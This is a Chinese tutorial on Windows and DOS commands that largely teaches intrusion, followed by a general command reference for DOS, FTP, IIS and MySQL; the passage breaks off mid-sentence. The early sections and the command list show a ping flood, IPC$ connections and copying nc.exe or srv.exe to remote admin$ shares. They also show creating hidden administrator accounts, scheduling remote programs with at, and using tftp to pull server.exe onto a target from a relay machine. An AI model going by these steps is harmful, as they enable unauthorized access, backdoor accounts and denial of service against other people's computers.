電腦基礎(chǔ)知識學習

1、電腦基本知識學習一，ping它是用來檢查網(wǎng)絡(luò)是否通暢或者網(wǎng)絡(luò)連接速度的命令。作為一個生活在網(wǎng)絡(luò)上的管理員或者黑客來說，ping命令是第一個必須掌握的DOS命令，它所利用的原理是這樣的：網(wǎng)絡(luò)上的機器都有唯一確定的IP地址，我們給目標IP地址發(fā)送一個數(shù)據(jù)包，對方就要返回一個同樣大小的數(shù)據(jù)包，根據(jù)返回的數(shù)據(jù)包我們可以確定目標主機的存在，可以初步判斷目標主機的操作系統(tǒng)等。下面就來看看它的一些常用的操作。先看看幫助吧，在DOS窗口中鍵入：ping /? 回車，在此，我們只掌握一些基本的很有用的參數(shù)就可以了（下同）。-t 表示將不間斷向目標IP發(fā)送數(shù)據(jù)包，直到我們強迫其停止。試想，如果你使用100M的寬帶

2、接入，而目標IP是56K的小貓，那么要不了多久，目標IP就因為承受不了這么多的數(shù)據(jù)而掉線，呵呵，一次攻擊就這么簡單的實現(xiàn)了。-l 定義發(fā)送數(shù)據(jù)包的大小，默認為32字節(jié)，我們利用它可以最大定義到65500字節(jié)。結(jié)合上面介紹的-t參數(shù)一起使用，會有更好的效果哦。-n 定義向目標IP發(fā)送數(shù)據(jù)包的次數(shù)，默認為3次。如果網(wǎng)絡(luò)速度比較慢，3次對我們來說也浪費了不少時間，因為現(xiàn)在我們的目的僅僅是判斷目標IP是否存在，那么就定義為一次吧。說明一下，如果-t 參數(shù)和 -n參數(shù)一起使用，ping命令就以放在后面的參數(shù)為標準，比如“ping IP -t -n 3”，雖然使用了-t參數(shù)，但并不是一直ping下去，而是

3、只ping 3次。另外，ping命令不一定非得ping IP，也可以直接ping主機域名，這樣就可以得到主機的IP。下面我們舉個例子來說明一下具體用法，這里time=2表示從發(fā)出數(shù)據(jù)包到接受到返回數(shù)據(jù)包所用的時間是2秒，從這里可以判斷網(wǎng)絡(luò)連接速度的大小 。從TTL的返回值可以初步判斷被ping主機的操作系統(tǒng)，之所以說“初步判斷”是因為這個值是可以修改的。這里TTL=32表示操作系統(tǒng)可能是win98。（小知識：如果TTL=128，則表示目標主機可能是Win2000；如果TTL=250，則目標主機可能是Unix）至于利用ping命令可以快速查找局域網(wǎng)故障，可以快速搜索最快的QQ服務(wù)器，可以對別人進

4、行ping攻擊這些就靠大家自己發(fā)揮了。二，nbtstat該命令使用TCP/IP上的NetBIOS顯示協(xié)議統(tǒng)計和當前TCP/IP連接，使用這個命令你可以得到遠程主機的NETBIOS信息，比如用戶名、所屬的工作組、網(wǎng)卡的MAC地址等。在此我們就有必要了解幾個基本的參數(shù)。-a 使用這個參數(shù)，只要你知道了遠程主機的機器名稱，就可以得到它的NETBIOS信息（下同）。-A 這個參數(shù)也可以得到遠程主機的NETBIOS信息，但需要你知道它的IP。-n 列出本地機器的NETBIOS信息。當?shù)玫搅藢Ψ降腎P或者機器名的時候，就可以使用nbtstat命令來進一步得到對方的信息了，這又增加了我們?nèi)肭值谋ｋU系數(shù)。三，

5、netstat這是一個用來查看網(wǎng)絡(luò)狀態(tài)的命令，操作簡便功能強大。-a 查看本地機器的所有開放端口，可以有效發(fā)現(xiàn)和預(yù)防木馬，可以知道機器所開的服務(wù)等信息。這里可以看出本地機器開放有FTP服務(wù)、Telnet服務(wù)、郵件服務(wù)、WEB服務(wù)等。用法：netstat -a IP。-r 列出當前的路由信息，告訴我們本地機器的網(wǎng)關(guān)、子網(wǎng)掩碼等信息。用法：netstat -r IP。四，tracert跟蹤路由信息，使用此命令可以查出數(shù)據(jù)從本地機器傳輸?shù)侥繕酥鳈C所經(jīng)過的所有途徑，這對我們了解網(wǎng)絡(luò)布局和結(jié)構(gòu)很有幫助。這里說明數(shù)據(jù)從本地機器傳輸?shù)降臋C器上，中間沒有經(jīng)過任何中轉(zhuǎn)，說明這兩臺機器是在同

6、一段局域網(wǎng)內(nèi)。用法：tracert IP。五，net這個命令是網(wǎng)絡(luò)命令中最重要的一個，必須透徹掌握它的每一個子命令的用法，因為它的功能實在是太強大了，這簡直就是微軟為我們提供的最好的入侵工具。首先讓我們來看一看它都有那些子命令，鍵入net /?回車。在這里，我們重點掌握幾個入侵常用的子命令。net view使用此命令查看遠程主機的所以共享資源。命令格式為net view IP。net use把遠程主機的某個共享資源影射為本地盤符，圖形界面方便使用，呵呵。命令格式為net use x: IPsharename。上面一個表示把IP的共享名為magic的目錄影射為本地的Z盤。下

7、面表示和建立IPC$連接（net use IPIPC$ password /user:name）。建立了IPC$連接后，呵呵，就可以上傳文件了：copy nc.exe admin$，表示把本地目錄下的nc.exe傳到遠程主機，結(jié)合后面要介紹到的其他DOS命令就可以實現(xiàn)入侵了。net start使用它來啟動遠程主機上的服務(wù)。當你和遠程主機建立連接后，如果發(fā)現(xiàn)它的什么服務(wù)沒有啟動，而你又想利用此服務(wù)怎么辦？就使用這個命令來啟動吧。用法：net start servername，成功啟動了telnet服務(wù)。net stop入侵后發(fā)現(xiàn)遠程主機的某個服務(wù)礙手礙

8、腳，怎么辦？利用這個命令停掉就ok了，用法和net start同。net user查看和帳戶有關(guān)的情況，包括新建帳戶、刪除帳戶、查看特定帳戶、激活帳戶、帳戶禁用等。這對我們?nèi)肭质呛苡欣?，最重要的，它為我們克隆帳戶提供了前提。鍵入不帶參數(shù)的net user，可以查看所有用戶，包括已經(jīng)禁用的。下面分別講解。1，net user abcd 1234 /add，新建一個用戶名為abcd，密碼為1234的帳戶，默認為user組成員。2，net user abcd /del，將用戶名為abcd的用戶刪除。3，net user abcd /active:no，將用戶名為abcd的用戶禁用。4，net us

9、er abcd /active:yes，激活用戶名為abcd的用戶。5，net user abcd，查看用戶名為abcd的用戶的情況。net localgroup查看所有和用戶組有關(guān)的信息和進行相關(guān)操作。鍵入不帶參數(shù)的net localgroup即列出當前所有的用戶組。在入侵過程中，我們一般利用它來把某個帳戶提升為administrator組帳戶，這樣我們利用這個帳戶就可以控制整個遠程主機了。用法：net localgroup groupname username /add，現(xiàn)在我們把剛才新建的用戶abcd加到administrator組里去了，這時候abcd用戶已經(jīng)是超級管理員了，呵呵，你可

10、以再使用net user abcd來查看他的狀態(tài)，和圖10進行比較就可以看出來。但這樣太明顯了，網(wǎng)管一看用戶情況就能漏出破綻，所以這種方法只能對付菜鳥網(wǎng)管，但我們還得知道?，F(xiàn)在的手段都是利用其他工具和手段克隆一個讓網(wǎng)管看不出來的超級管理員，這是后話。有興趣的朋友可以參照黑客防線第30期上的由淺入深解析隆帳戶一文。net time這個命令可以查看遠程主機當前的時間。如果你的目標只是進入到遠程主機里面，那么也許就用不到這個命令了。但簡單的入侵成功了，難道只是看看嗎？我們需要進一步滲透。這就連遠程主機當前的時間都需要知道，因為利用時間和其他手段（后面會講到）可以實現(xiàn)某個命令和程序的定時啟動，為我們進

11、一步入侵打好基礎(chǔ)。用法：net time IP。六，at這個命令的作用是安排在特定日期或時間執(zhí)行某個特定的命令和程序（知道net time的重要了吧？）。當我們知道了遠程主機的當前時間，就可以利用此命令讓其在以后的某個時間（比如2分鐘后）執(zhí)行某個程序和命令。用法：at time command computer。表示在6點55分時，讓名稱為a-01的計算機開啟telnet服務(wù)（這里net start telnet即為開啟telnet服務(wù)的命令）。七，ftp大家對這個命令應(yīng)該比較熟悉了吧？網(wǎng)絡(luò)上開放的ftp的主機很多，其中很大一部分是匿名的，也就是說任何人都可以登陸上去?，F(xiàn)在如果你掃到了一臺開放

12、ftp服務(wù)的主機（一般都是開了21端口的機器），如果你還不會使用ftp的命令怎么辦？下面就給出基本的ftp命令使用方法。首先在命令行鍵入ftp回車，出現(xiàn)ftp的提示符，這時候可以鍵入“help”來查看幫助（任何DOS命令都可以使用此方法查看其幫助）。大家可能看到了，這么多命令該怎么用？其實也用不到那么多，掌握幾個基本的就夠了。首先是登陸過程，這就要用到open了，直接在ftp的提示符下輸入“open 主機IP ftp端口”回車即可，一般端口默認都是21，可以不寫。接著就是輸入合法的用戶名和密碼進行登陸了，這里以匿名ftp為例介紹。用戶名和密碼都是ftp，密碼是不顯示的。當提示* logged

13、in時，就說明登陸成功。這里因為是匿名登陸，所以用戶顯示為Anonymous。接下來就要介紹具體命令的使用方法了。dir 跟DOS命令一樣，用于查看服務(wù)器的文件，直接敲上dir回車，就可以看到此ftp服務(wù)器上的文件。cd 進入某個文件夾。get 下載文件到本地機器。put 上傳文件到遠程服務(wù)器。這就要看遠程ftp服務(wù)器是否給了你可寫的權(quán)限了，如果可以，呵呵，該怎么 利用就不多說了，大家就自由發(fā)揮去吧。delete 刪除遠程ftp服務(wù)器上的文件。這也必須保證你有可寫的權(quán)限。bye 退出當前連接。quit 同上。八，telnet功能強大的遠程登陸命令，幾乎所有的入侵者都喜歡用它，屢試不爽。為什么？

14、它操作簡單，如同使用自己的機器一樣，只要你熟悉DOS命令，在成功以administrator身份連接了遠程機器后，就可以用它來干你想干的一切了。下面介紹一下使用方法，首先鍵入telnet回車，再鍵入help查看其幫助信息。然后在提示符下鍵入open IP回車，這時就出現(xiàn)了登陸窗口，讓你輸入合法的用戶名和密碼，這里輸入任何密碼都是不顯示的。當輸入用戶名和密碼都正確后就成功建立了telnet連接，這時候你就在遠程主機上具有了和此用戶一樣的權(quán)限，利用DOS命令就可以實現(xiàn)你想干的事情了。這里我使用的超級管理員權(quán)限登陸的。到這里為止，網(wǎng)絡(luò)DOS命令的介紹就告一段落了，這里介紹的目的只是給菜鳥網(wǎng)管一個印象

15、，讓其知道熟悉和掌握網(wǎng)絡(luò)DOS命令的重要性。其實和網(wǎng)絡(luò)有關(guān)的DOS命令還遠不止這些，這里只是拋磚引玉，希望能對廣大菜鳥網(wǎng)管有所幫助。學好DOS對當好網(wǎng)管有很大的幫助，特別的熟練掌握了一些網(wǎng)絡(luò)的DOS命令。另外大家應(yīng)該清楚，任何人要想進入系統(tǒng)，必須得有一個合法的用戶名和密碼（輸入法漏洞差不多絕跡了吧），哪怕你拿到帳戶的只有一個很小的權(quán)限，你也可以利用它來達到最后的目的。所以堅決消滅空口令，給自己的帳戶加上一個強壯的密碼，是最好的防御弱口令入侵的方法。最后，由衷的說一句，培養(yǎng)良好的安全意識才是最重要的。DOS講解 雖然現(xiàn)在大家用的都是Windows 9x或是Windows 2000/XP，而且我們

16、在這里學習的主要內(nèi)容也是DOS所不擅長的網(wǎng)絡(luò)！但即使是在Windows風行的現(xiàn)在我們也離不開DOS。如果你能熟練使用DOS，那它可以給你帶來極大的方便！而且在我們的Windows出現(xiàn)問題的時候大多也都是用DOS來修復(fù)的，所以學習一些DOS知識是必要的。在這里我給大家講的是一些用來安裝和修復(fù)系統(tǒng)的命令，并不涉及網(wǎng)絡(luò)方面！基礎(chǔ)DOS是英語中Disk Operation System(磁盤操作系統(tǒng))的縮寫，其實DOS的版本有很多，比如MS-DOS、PC-DOS、FreeDOS等等，現(xiàn)在我們最常用的是MS-DOS（MS是Microsoft的縮寫），在1995年前，當Windows 95還沒有出現(xiàn)的年代

17、里，那是DOS的天下。MS-DOS的最終獨立版本是MS-DOS 6.22，再后來的DOS 7.0及其它后續(xù)版本都是在Windows里帶的，不是單獨發(fā)行版本。在DOS環(huán)境下，我們面對的不是桌面和圖標，而是這樣的電腦屏幕：這個C:叫做提示符，這個閃動的橫線叫做光標。這時候DOS已經(jīng)準備好，我們現(xiàn)在所需要做的，就是輸入一個命令讓DOS去執(zhí)行。在DOS中，每條命令輸入完成后要都要以回車做為確認或者說是終結(jié)，例：在DOS里，盤符用英文字母加上冒號來表示（如：A:、C:、D:），Windows中的“文件夾”被稱為“目錄”，用“”來分隔不同層的目錄，最上層的單獨一個“”（如：C:或只一個）叫“根目錄”，我們

18、可以輸入dir（顯示目錄內(nèi)容，以后將講到它的具體使用方法）命令來查看當前目錄中的子目錄及文件，例：如圖所示，后面帶有的是目錄，沒有的則是文件。在DOS中，文件名的規(guī)則是8.3形式，即一個文件名由文件基本名和文件擴展名組 成，中間用點“.”隔開，文件基本名由不超過8個英文字母或數(shù)字組成，文件擴展名由不超過三個英文字母或數(shù)字組成，文件基本名必須有，擴展名可以沒有?？瓷蠄D，第一列的就是“文件基本名”，第二列的是“文件擴展名”。注意：在用dir命令顯示文件列表時，文件基本名和擴展名之間并無“.”分隔符，但你在輸入完整的文件名時必須輸入它。第三列顯示的是文件的大小，表示它占用了多少存儲空間，也就是文件包

19、含信息的多少，包含的信息越多，文件就越大；第四列表示的是文件建立的日期或者是最后被改動的日期，每個文件都有對應(yīng)的生成時間，就象每個人都有自己的生日一樣，文件的生成時間就是文件形成的時候。時間采用通常的表示方法，由年、月、日組成。最后一列表示文件生成的具體時間，最后的一個字母a表示上午，p表示下午。我們再來看看倒數(shù)一二行，這些是什么意思呢?！?10 file(s) ”是要告訴你這個目錄內(nèi)有 “ 10 ”個文件，這些文件加起來一共有“ 64，692 bytes”大，在這種計算中，每個子目錄也算是一個文件，但它的大小算零。最后一行的是告訴你當前你的工作磁盤上還剩下“ 215，735，513 byte

20、s”大小可用的磁盤空間。用dir命令來查看磁盤上文件時，你會發(fā)現(xiàn)文件后綴（即文件擴展名）有很多種，它們當中大部分都是有一定含義的。其中凡后綴為exe、com或bat的文件都是可以直接執(zhí)行的。這些以exe為后綴的文件叫可執(zhí)行文件；以com為后綴的文件叫命令文件；以bat為后綴的文件叫批處理文件。如果我們要執(zhí)行這些文件，只需在提示符下敲入文件基本名然后回車即可，不需輸入文件后綴?；久頓OS的命令使用方法，大多都是這種格式：命令名 參數(shù)1 參數(shù)2 參數(shù)3|參數(shù)4 參數(shù)5:選項 參數(shù)6:說明：以上命令中“命令名”是必要的，加方括號的參數(shù)是可選的，加豎線的兩個命令只能選其一，加大括號的是必選項。如上

21、命令解釋是這樣的：命令名是必須要有的；“參數(shù)1”是必須的；“參數(shù)2”是可選的；“參數(shù)3”和“參數(shù)4”兩個參數(shù)只能選用其中一個，不能兩個同時用；“參數(shù)5”使用時要加選項，用“：”分隔；“參數(shù)6”使用時要加選項，但“選項1”和“選項2”要且僅能選用其中一個，不能兩個都用，但也不能兩個都不用。這也是DOS命令書寫的規(guī)范吧！所有的DOS命令使用方法都是這樣寫的，大家也可以自己看看，一般的命令都可以用“/?”參數(shù)或不加參數(shù)來查看幫助，在這里我們只講這些命令的基本使用方法。有些命令在使用時，可以使用“通配符”。通配符有兩個，“*”和“?”，其中“*”代表任意個任何字符，“?”只代表一個任意字符。在有些命令

22、中，驅(qū)動器和路徑是可選項，如果不指明驅(qū)去器名，默認為當前驅(qū)去器，如果不指明目錄則默認為當前目錄。dir使用方法：DIR 盤符:路徑文件名 /P /W /A/P 每滿一頁時暫停/W 使用橫向顯示方式/A 顯示所以文件/B 只顯示文件名功能：顯示一類或所以文件列表，支持通配符。例：cd使用方法：cd 目錄名目錄名目錄名.功能：顯示或改變當前目錄例：md使用方法：md 盤符:路徑目錄名功能：建立一個新目錄例：del使用方法：del 盤符:路徑文件名功能：刪除一個或多個文件，可以使用通配符。例：刪除一個文件：按此在新窗口瀏覽圖片刪除擴展名為sys的文件：按此在新窗口瀏覽圖片刪除所有文件：deltree

23、使用方法：deltree 盤符:路徑目錄名功能：刪除一個目錄，刪除目錄同時將刪除目錄中的所有文件例：ren使用方法：ren 盤符:路徑原文件名 修改后文件名功能：修改文件名例： type使用方法：type 盤符:路徑文件名功能：顯示文件內(nèi)容，只能顯示文本文件例：copy使用方法：copy 盤符:路徑源文件名 盤符:路徑目標文件名功能：復(fù)制一個或一類文件，如果不指明目標文件名，則默認為目標文件名與源文件名相同net use ipipc$ /user: 建立IPC空鏈接 net use ipipc$ 密碼 /user:用戶名 建立IPC非空鏈接 net use h: ipc$ 密碼 /user:用

24、戶名 直接登陸后映射對方C：到本地為H: net use h: ipc$ 登陸后映射對方C：到本地為H: net use ipipc$ /del 刪除IPC鏈接 net use h: /del 刪除映射對方到本地的為H:的映射 net user 用戶名 密碼 /add 建立用戶 net user guest /active:yes 激活guest用戶 net user 查看有哪些用戶 net user 帳戶名 查看帳戶的屬性 net localgroup administrators 用戶名 /add 把“用戶”添加到管理員中使其具有管理員權(quán)限,注意：administrator后加s用復(fù)數(shù) n

25、et start 查看開啟了哪些服務(wù) net start 服務(wù)名 開啟服務(wù)；(如:net start telnet， net start schedule) net stop 服務(wù)名 停止某服務(wù) net time 目標ip 查看對方時間 net time 目標ip /set 設(shè)置本地計算機時間與“目標IP”主機的時間同步,加上參數(shù)/yes可取消確認信息 net view 查看本地局域網(wǎng)內(nèi)開啟了哪些共享 net view ip 查看對方局域網(wǎng)內(nèi)開啟了哪些共享 net config 顯示系統(tǒng)網(wǎng)絡(luò)設(shè)置 net logoff 斷開連接的共享 net pause 服務(wù)名 暫停某服務(wù) net send i

26、p 文本信息 向?qū)Ψ桨l(fā)信息 net ver 局域網(wǎng)內(nèi)正在使用的網(wǎng)絡(luò)連接類型和信息 net share 查看本地開啟的共享 net share ipc$ 開啟ipc$共享 net share ipc$ /del 刪除ipc$共享 net share c$ /del 刪除C：共享 net user guest 12345 用guest用戶登陸后用將密碼改為12345 net password 密碼 更改系統(tǒng)登陸密碼 netstat -a 查看開啟了哪些端口,常用netstat -an netstat -n 查看端口的網(wǎng)絡(luò)連接情況，常用netstat -an netstat -v 查看正在進行的工作

27、 netstat -p 協(xié)議名 例：netstat -p tcq/ip 查看某協(xié)議使用情況（查看tcp/ip協(xié)議使用情況） netstat -s 查看正在使用的所有協(xié)議使用情況 nbtstat -A ip 對方136到139其中一個端口開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數(shù)-A要大寫 tracert -參數(shù) ip(或計算機名) 跟蹤路由（數(shù)據(jù)包），參數(shù)：“-w數(shù)字”用于設(shè)置超時間隔。 ping ip(或域名) 向?qū)Ψ街鳈C發(fā)送默認大小為32字節(jié)的數(shù)據(jù)，參數(shù)：“-l空格數(shù)據(jù)包大小”；“-n發(fā)送數(shù)據(jù)次數(shù)”；“-t”指一直ping。 ping -t -l 65550 i

28、p 死亡之ping(發(fā)送大于K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數(shù)“/all”顯示全部配置信息 tlist -t 以樹行列表顯示進程(為系統(tǒng)的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內(nèi)) kill -F 進程名 加-F參數(shù)后強制結(jié)束某進程(為系統(tǒng)的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內(nèi)) del -F 文件名 加-F參數(shù)后就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪

29、除只讀、隱藏、系統(tǒng)、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統(tǒng)、存檔以外的文件。例如“DEL/AR *.*”表示刪除當前目錄下所有只讀文件，“DEL/A-S *.*”表示刪除當前目錄下除系統(tǒng)文件以外的所有文件del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數(shù)/Q 可取消刪除操作時的系統(tǒng)確認就直接刪除。（二個命令作用相同） move 盤符路徑要移動的文件名 存放移動文件的路徑移動后文件名 移動文件,用參數(shù)/y將取消確認移動目錄存在相同文件的提示就直接覆蓋 fc one.txt two.txt 3st.

30、txt 對比二個文件并把不同之處輸出到3st.txt文件中， 和 是重定向命令 at id號 開啟已注冊的某個計劃任務(wù) at /delete 停止所有計劃任務(wù)，用參數(shù)/yes則不需要確認就直接停止 at id號 /delete 停止某個已注冊的計劃任務(wù) at 查看所有的計劃任務(wù) at ip time 程序名(或一個命令) /r 在某時間運行對方某程序并重新啟動計算機 finger username host 查看最近有哪些用戶登陸 telnet ip 端口 遠和登陸服務(wù)器,默認端口為23 open ip 連接到IP（屬telnet登陸后的命令） telnet 在本機上直接鍵入telnet 將進

31、入本機的telnet copy 路徑文件名1 路徑文件名2 /y 復(fù)制文件1到指定的目錄為文件2，用參數(shù)/y就同時取消確認你要改寫一份現(xiàn)存目錄文件 copy c:srv.exe ipadmin$ 復(fù)制本地c:srv.exe到對方的admin下 cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內(nèi)容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件頭要空三排，參數(shù)：/b指二進制文件，/a指ASCLL格式文件 copy ipadmin$svv.exe c: 或:copyipadmin$*.* 復(fù)制對方admini$共享下的srv.exe文件（

32、所有文件）至本地C： xcopy 要復(fù)制的文件或目錄樹 目標地址目錄名 復(fù)制文件和目錄樹，用參數(shù)/Y將不提示覆蓋相同文件 tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:server.exe 登陸后，將“IP”的server.exe下載到目標主機c:server.exe 參數(shù)：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送 tftp -i 對方IP put c:server.exe 登陸后，上傳本地c:server.exe至主機 ftp ip 端口 用于上傳文件至服務(wù)器或進行文件操作，默認端口為

33、21。bin指用二進制方式傳送（可執(zhí)行文件進）；默認為ASCII格式傳送(文本文件時) route print 顯示出IP路由，將主要顯示網(wǎng)絡(luò)地址Network addres，子網(wǎng)掩碼Netmask，網(wǎng)關(guān)地址Gateway addres，接口地址Interface arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息 start 程序名或命令 /max 或/min 新開一個新窗口并最大化（最小化）運行某程序或命令 mem 查看cpu使用情況 attrib 文件名(目錄名) 查看某文件（目錄）的屬性 attrib 文件名

34、-A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔，只讀，系統(tǒng)，隱藏 屬性；用則是添加為某屬性 dir 查看文件，參數(shù)：/Q顯示文件及目錄屬系統(tǒng)哪個用戶，/T:C顯示文件創(chuàng)建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間 date /t 、 time /t 使用此參數(shù)即“DATE/T”、“TIME/T”將只顯示當前日期和時間，而不必輸入新日期和時間 set 指定環(huán)境變量名稱=要指派給變量的字符 設(shè)置環(huán)境變量 set 顯示當前所有的環(huán)境變量 set p(或其它字符) 顯示出當前以字符p(或其它字符)開頭的所有環(huán)境變量 pause 暫停批處理程序，并顯示出

35、：請按任意鍵繼續(xù). if 在批處理程序中執(zhí)行條件處理（更多說明見if命令及變量） goto 標簽 將cmd.exe導(dǎo)向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如：“：start”標簽） call 路徑批處理文件名 從批處理程序中調(diào)用另一個批處理程序 （更多說明見call /?） for 對一組文件中的每一個文件執(zhí)行某個特定命令（更多說明見for命令及變量） echo on或off 打開或關(guān)閉echo，僅用echo不加參數(shù)則顯示當前echo設(shè)置 echo 信息 在屏幕上顯示出信息 echo 信息 pass.txt 將信息保存到pass.txt文件中 findstr Hello

36、 aa.txt 在aa.txt文件中尋找字符串hello find 文件名 查找某文件 title 標題名字 更改CMD窗口標題名字 color 顏色值 設(shè)置cmd控制臺前景和背景顏色；0黑、1藍、2綠、3淺綠、4紅、5紫、6黃、7=白、8=灰、9=淡藍、A淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白 prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:、D:統(tǒng)一改為：EntSky ) print 文件名 打印文本文件ver 在DOS窗口下顯示版本信息 winver 彈出一個窗口顯示版本信息（內(nèi)存大小、系統(tǒng)版本、補丁版本、計算機名） format 盤符 /FS:類型 格

37、式化磁盤,類型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS md 目錄名 創(chuàng)建目錄 replace 源文件 要替換文件的目錄 替換文件 ren 原文件名 新文件名 重命名文件名 tree 以樹形結(jié)構(gòu)顯示出目錄，用參數(shù)-f 將列出第個文件夾中文件名稱 type 文件名 顯示文本文件的內(nèi)容 more 文件名 逐屏顯示輸出文件 doskey 要鎖定的命令字符doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行，重新調(diào)用win2k命令，并創(chuàng)建宏)。如：鎖定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解鎖：doskey

38、dir= taskmgr 調(diào)出任務(wù)管理器 chkdsk /F D: 檢查磁盤D并顯示狀態(tài)報告；加參數(shù)/f并修復(fù)磁盤上的錯誤 tlntadmn telnt服務(wù)admn,鍵入tlntadmn選擇3，再選擇8,就可以更改telnet服務(wù)默認端口23為其它任何端口 exit 退出cmd.exe程序或目前，用參數(shù)/B則是退出當前批處理腳本而不是cmd.exe path 路徑可執(zhí)行文件的文件名 為可執(zhí)行文件設(shè)置一個路徑。 cmd 啟動一個win2K命令解釋窗口。參數(shù)：/eff、/en 關(guān)閉、開啟命令擴展；更我詳細說明見cmd /? regedit /s 注冊表文件名 導(dǎo)入注冊表；參數(shù)/S指安靜模式導(dǎo)入，無

39、任何提示； regedit /e 注冊表文件名 導(dǎo)出注冊表 cacls 文件名 參數(shù) 顯示或修改文件訪問控制列表（ACL）針對NTFS格式時。參數(shù)：/D 用戶名:設(shè)定拒絕某用戶訪問；/P 用戶名:perm 替換指定用戶的訪問權(quán)限；/G 用戶名:perm 賦予指定用戶訪問權(quán)限；Perm 可以是: N 無，R 讀取， W 寫入， C 更改(寫入)，F(xiàn) 完全控制；例：cacls D:test.txt /D pub 設(shè)定d:test.txt拒絕pub用戶訪問。 cacls 文件名 查看文件的訪問用戶權(quán)限列表 REM 文本內(nèi)容 在批處理文件中添加注解 netsh 查看或更改本地網(wǎng)絡(luò)配置情況IIS服務(wù)命令

40、： iisreset /reboot 重啟win2k計算機（但有提示系統(tǒng)將重啟信息出現(xiàn)） iisreset /start或stop 啟動（停止）所有Internet服務(wù) iisreset /restart 停止然后重新啟動所有Internet服務(wù) iisreset /status 顯示所有Internet服務(wù)狀態(tài) iisreset /enable或disable 在本地系統(tǒng)上啟用（禁用）Internet服務(wù)的重新啟動 iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務(wù)時，若發(fā)生錯誤將重新開機 iisreset /noforce 若無法停止Internet

41、服務(wù)，將不會強制終止Internet服務(wù) iisreset /timeout Val在到達逾時間（秒）時，仍未停止Internet服務(wù)，若指定/rebootonerror參數(shù)，則電腦將會重新開機。預(yù)設(shè)值為重新啟動20秒，停止60秒，重新開機0秒。 FTP 命令： (后面有詳細說明內(nèi)容) ftp的命令行格式為:ftp v d i n g主機名 v 顯示遠程服務(wù)器的所有響應(yīng)信息。d 使用調(diào)試方式。 n 限制ftp的自動登錄,即不使用.netrc文件。g 取消全局文件名。 help 命令 或 ？命令 查看命令說明 bye 或 quit 終止主機FTP進程,并退出FTP管理方式. pwd 列出當前遠端

42、主機目錄 put 或 send 本地文件名 上傳到主機上的文件名 將本地一個文件傳送至遠端主機中 get 或 recv 遠程主機文件名 下載到本地后的文件名 從遠端主機中傳送至本地主機中 mget remote-files 從遠端主機接收一批文件至本地主機 mput local-files 將本地主機中一批文件傳送至遠端主機 dir 或 ls remote-directory local-file 列出當前遠端主機目錄中的文件.如果有本地文件,就將結(jié)果寫至本地文件 ascii 設(shè)定以ASCII方式傳送文件(缺省值) bin 或 image 設(shè)定以二進制方式傳送文件 bell 每完成一次文件傳送

43、,報警提示 cdup 返回上一級目錄 close 中斷與遠程服務(wù)器的ftp會話(與open對應(yīng)) open hostport 建立指定ftp服務(wù)器連接,可指定連接端口 delete 刪除遠端主機中的文件 mdelete remote-files 刪除一批文件 mkdir directory-name 在遠端主機中建立目錄 rename from to 改變遠端主機中的文件名 rmdir directory-name 刪除遠端主機中的目錄 status 顯示當前FTP的狀態(tài) system 顯示遠端主機系統(tǒng)類型 user user-name password account 重新以別的用戶名登錄遠

44、端主機 open host port 重新建立一個新的連接 prompt 交互提示模式 macdef 定義宏命令 lcd 改變當前本地主機的工作目錄,如果缺省,就轉(zhuǎn)到當前用戶的HOME目錄 chmod 改變遠端主機的文件權(quán)限 case 當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉(zhuǎn)換為小寫字母 cd remotedir 進入遠程主機目錄 cdup 進入遠程主機目錄的父目錄 ! 在本地機中執(zhí)行交互shell，exit回到ftp環(huán)境,如!ls.zipMYSQL 命令： mysql -h主機地址 -u用戶名 p密碼 連接MYSQL;如果剛安裝好MYSQL，超級用戶root是沒有密碼的。（

45、例：mysql -h10 -Uroot -P123456 注:u與root可以不用加空格，其它也一樣） exit 退出MYSQL mysqladmin -u用戶名 -p舊密碼 password 新密碼 修改密碼 grant select on 數(shù)據(jù)庫.* to 用戶名登錄主機 identified by 密碼; 增加新用戶。（注意：和上面不同，下面的因為是MYSQL環(huán)境中的命令，所以后面都帶一個分號作為命令結(jié)束符） show databases; 顯示數(shù)據(jù)庫列表。剛開始時才兩個數(shù)據(jù)庫：mysql和test。mysql庫很重要它里面有MYSQL的系統(tǒng)信息，我們改密碼和新

46、增用戶，實際上就是用這個庫進行操作。 use mysql；show tables; 顯示庫中的數(shù)據(jù)表 describe 表名; 顯示數(shù)據(jù)表的結(jié)構(gòu) create database 庫名; 建庫 use 庫名；create table 表名 (字段設(shè)定列表)； 建表 drop database 庫名; drop table 表名； 刪庫和刪表 delete from 表名; 將表中記錄清空 select * from 表名; 顯示表中的記錄 mysqldump -opt schoolschool.bbb 備份數(shù)據(jù)庫：（命令在DOS的mysqlbin目錄下執(zhí)行）;注釋:將數(shù)據(jù)庫school備份到sc

